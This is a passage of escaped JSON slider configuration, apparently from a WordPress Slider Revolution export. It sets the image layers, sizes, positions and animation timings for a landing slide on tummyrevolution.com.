":\"121px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-107px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":820},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":700,\"start\":820,\"startRelative\":820},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":700,\"start\":820,\"startRelative\":820},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":3500,\"startRelative\":1980,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"6\":{\"text\":\"Image 5\",\"alias\":\"Cvekla\",\"uid\":6,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic51.png\",\"imageId\":4596},\"size\":{\"width\":{\"d\":{\"v\":\"409px\",\"e\":true},\"n\":{\"v\":\"395px\",\"e\":true},\"t\":{\"v\":\"205px\",\"e\":true},\"m\":{\"v\":\"96px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"98px\",\"e\":true},\"n\":{\"v\":\"95px\",\"e\":true},\"t\":{\"v\":\"49px\",\"e\":true},\"m\":{\"v\":\"23px\",\"e\":true}},\"originalWidth\":409,\"originalHeight\":98,\"aspectRatio\":{\"d\":{\"v\":4.173469387755101678294522571377456188201904296875},\"n\":{\"v\":4.173469387755101678294522571377456188201904296875},\"t\":{\"v\":4.173469387755101678294522571377456188201904296875},\"m\":{\"v\":4.173469387755101678294522571377456188201904296875}}},\"position\":{\"x\":{\"d\":{\"v\":\"1091px\",\"e\":true},\"n\":{\"v\":\"344px\",\"e\":true},\"t\":{\"v\":\"575px\",\"e\":true},\"m\":{\"v\":\"345px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-145px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":920},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":920,\"startRelative\":920},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":1500,\"start\":920,\"startRelative\":920},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":3500,\"startRelative\":1080,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"7\":{\"text\":\"Image 6\",\"alias\":\"Leaf\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic71.png\",\"imageId\":4597},\"size\":{\"width\":{\"d\":{\"v\":\"516px\",\"e\":true},\"n\":{\"v\":\"299px\",\"e\":true},\"t\":{\"v\":\"277px\",\"e\":true},\"m\":{\"v\":\"113px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"305px\",\"e\":true},\"n\":{\"v\":\"177px\",\"e\":true},\"t\":{\"v\":\"164px\",\"e\":true},\"m\":{\"v\":\"67px\",\"e\":true}},\"originalWidth\":516,\"originalHeight\":305,\"aspectRatio\":{\"d\":{\"v\":1.6918032786885246476771271773031912744045257568359375},\"n\":{\"v\":1.6918032786885246476771271773031912744045257568359375},\"t\":{\"v\":1.6918032786885246476771271773031912744045257568359375},\"m\":{\"v\":1.6918032786885246476771271773031912744045257568359375}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"527px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"57px\",\"e\":true},\"n\":{\"v\":\"40px\",\"e\":true},\"t\":{\"v\":\"295px\",\"e\":true},\"m\":{\"v\":\"206px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":10,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":700},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3500,\"startRelative\":1900,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"8\":{\"text\":\"Image 7\",\"alias\":\"Cream\",\"uid\":8,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic61.png\",\"imageId\":4598},\"size\":{\"width\":{\"d\":{\"v\":\"362px\",\"e\":true},\"n\":{\"v\":\"217px\",\"e\":true},\"t\":{\"v\":\"159px\",\"e\":true},\"m\":{\"v\":\"159px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"205px\",\"e\":true},\"n\":{\"v\":\"123px\",\"e\":true},\"t\":{\"v\":\"90px\",\"e\":true},\"m\":{\"v\":\"90px\",\"e\":true}},\"originalWidth\":362,\"originalHeight\":205,\"aspectRatio\":{\"d\":{\"v\":1.7658536585365853799345359220751561224460601806640625},\"n\":{\"v\":1.7658536585365853799345359220751561224460601806640625},\"t\":{\"v\":1.7658536585365853799345359220751561224460601806640625},\"m\":{\"v\":1.7658536585365853799345359220751561224460601806640625}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"559px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"185px\",\"e\":true},\"n\":{\"v\":\"86px\",\"e\":true},\"t\":{\"v\":\"358px\",\"e\":true},\"m\":{\"v\":\"358px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":11,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":800},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":3500,\"startRelative\":1800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"9\":{\"text\":\"Image 8\",\"alias\":\"Logo\",\"uid\":9,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic81.png\",\"imageId\":4599},\"size\":{\"width\":{\"d\":{\"v\":\"850px\",\"e\":true},\"n\":{\"v\":\"725px\",\"e\":true},\"t\":{\"v\":\"464px\",\"e\":true},\"m\":{\"v\":\"464px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"150px\",\"e\":true},\"n\":{\"v\":\"128px\",\"e\":true},\"t\":{\"v\":\"82px\",\"e\":true},\"m\":{\"v\":\"82px\",\"e\":true}},\"originalWidth\":850,\"originalHeight\":150,\"aspectRatio\":{\"d\":{\"v\":5.66666666666666696272613990004174411296844482421875},\"n\":{\"v\":5.66666666666666696272613990004174411296844482421875},\"t\":{\"v\":5.66666666666666696272613990004174411296844482421875},\"m\":{\"v\":5.66666666666666696272613990004174411296844482421875}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"5px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"-90px\",\"e\":true},\"m\":{\"v\":\"-35px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":12,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim 